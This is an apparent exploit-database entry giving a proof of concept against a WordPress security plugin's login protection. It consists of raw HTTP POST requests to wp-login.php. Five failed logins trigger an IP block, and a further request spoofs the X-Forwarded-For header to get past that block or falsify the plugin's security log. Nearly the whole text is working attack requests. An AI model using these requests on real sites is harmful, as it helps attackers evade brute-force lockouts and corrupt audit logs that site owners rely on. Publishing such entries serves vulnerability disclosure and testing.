Share
## https://sploitus.com/exploit?id=WPEX-ID:1D748F91-773B-49D6-8F68-A27D397713C3
Send 5 invalid login requests and thus block the IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Send login request with X-Forwarded header and spoofed IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
X-Forwarded-For: 8.8.8.8

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Check the logs by visiting /wp-admin/options-general.php?page=spbc&spbc_tab=security_log.